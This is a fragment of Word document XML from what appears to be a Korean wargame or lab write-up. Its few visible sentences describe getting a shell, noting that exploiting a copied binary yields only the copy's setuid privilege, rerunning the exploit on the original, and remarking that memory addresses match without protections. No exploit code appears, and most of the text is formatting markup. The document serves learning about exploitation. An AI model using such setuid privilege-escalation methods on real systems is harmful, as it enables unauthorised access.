            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>ash</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>쉘을 땃다.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00957EA3" w:rsidRPr="004226B4" w:rsidRDefault="004226B4" w:rsidP="009E76BA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계정을 확인해보니 그대로 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">gate </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>이다.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00057C3D" w:rsidRDefault="00057C3D" w:rsidP="00070105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복사한 파일을 익스플로잇 하면 복사한 파일의 s</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>etuid(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>g</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>ate)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>권한을 얻는다</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00057C3D" w:rsidRDefault="00057C3D" w:rsidP="000701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2CC01C" wp14:editId="16797D1A">
                  <wp:extent cx="6645910" cy="1565910"/>
                  <wp:effectExtent l="0" t="0" r="254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56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7C3D" w:rsidRDefault="00057C3D" w:rsidP="00070105">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>따라서 원본파일을 위 방식으로 다시 진행하였다.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00057C3D" w:rsidRDefault="00057C3D" w:rsidP="00070105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(원본파일과 복사본 파일의 메모리 주소는 같다</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>)[*</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>특별한 보호 기법이 없다면]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009E76BA" w:rsidRPr="00057C3D" w:rsidRDefault="009E76BA" w:rsidP="00BD70A1">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:bookmarkStart w:id="0" w:name="_GoBack"/>
        <w:bookmarkEnd w:id="0"/>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="007B012B" w:rsidRDefault="007B012B" w:rsidP="007B012B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="007B012B" w:rsidSect="007B012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6E95" w:rsidRDefault="00A96E95" w:rsidP="009333D3">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00A96E95" w:rsidRDefault="00A96E95" w:rsidP="00933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6E95" w:rsidRDefault="00A96E95" w:rsidP="009333D3">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00A96E95" w:rsidRDefault="00A96E95" w:rsidP="00933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C48C8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D9D8B1BE"/>
    <w:lvl w:ilvl="0" w:tplc="4DFAEA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2B"/>
    <w:rsid w:val="00005489"/>
    <w:rsid w:val="000275C7"/>
    <w:rsid w:val="0003344E"/>
    <w:rsid w:val="00057C3D"/>
    <w:rsid w:val="00067F3E"/>
    <w:rsid w:val="00070105"/>
    <w:rsid w:val="000724C2"/>
    <w:rsid w:val="00154239"/>
    <w:rsid w:val="00164754"/>
    <w:rsid w:val="0019309D"/>
    <w:rsid w:val="001D52B4"/>
    <w:rsid w:val="001E478E"/>
    <w:rsid w:val="00205BCA"/>
    <w:rsid w:val="002E1516"/>
    <w:rsid w:val="00301FFD"/>
    <w:rsid w:val="00323A96"/>
    <w:rsid w:val="00384544"/>
    <w:rsid w:val="004226B4"/>
    <w:rsid w:val="004C025F"/>
    <w:rsid w:val="004E4EA5"/>
    <w:rsid w:val="006113D7"/>
    <w:rsid w:val="006140B4"/>
    <w:rsid w:val="006B2E34"/>
    <w:rsid w:val="00785E0C"/>
    <w:rsid w:val="007B012B"/>
    <w:rsid w:val="008B06AF"/>
    <w:rsid w:val="00913F3B"/>
    <w:rsid w:val="009333D3"/>
    <w:rsid w:val="00957EA3"/>
    <w:rsid w:val="009A4CE8"/>
    <w:rsid w:val="009E76BA"/>
    <w:rsid w:val="00A96E95"/>
    <w:rsid w:val="00AA4761"/>
    <w:rsid w:val="00B77FED"/>
    <w:rsid w:val="00BD70A1"/>
    <w:rsid w:val="00C155D2"/>
    <w:rsid w:val="00C80523"/>
    <w:rsid w:val="00DF155F"/>
    <w:rsid w:val="00F57151"/>
    <w:rsid w:val="00F71910"/>
    <w:rsid w:val="00FC7FE2"/>
    <w:rsid w:val="00FE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D5CFC"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F8599F10-CBB3-4BCD-A11E-8156F8999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7B01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333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33D3"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a5">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009333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33D3"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a6">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="006B2E34"/>
    <w:pPr>
      <w:ind w:leftChars="400" w:left="800"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="a7">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00070105"/>
    <w:rPr>
      <w:strike w:val="0"/>
      <w:dstrike w:val="0"/>
      <w:color w:val="000000"/>
      <w:u w:val="none"/>
      <w:effect w:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a8">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00070105"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="setextarea">
    <w:name w:val="se_textarea"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="000701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inherit" w:eastAsia="굴림" w:hAnsi="inherit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7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97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5059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23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435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1545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63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81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156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166267">
                                                              <w:marLeft w:val="0"/>
                                                              <w:marRight w:val="0"/>
                                                              <w:marTop w:val="4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387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26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0292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8017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6986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6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13</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-01-04T07:25:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-01-05T09:33:00Z</dcterms:modified>
</cp:coreProperties>
</file>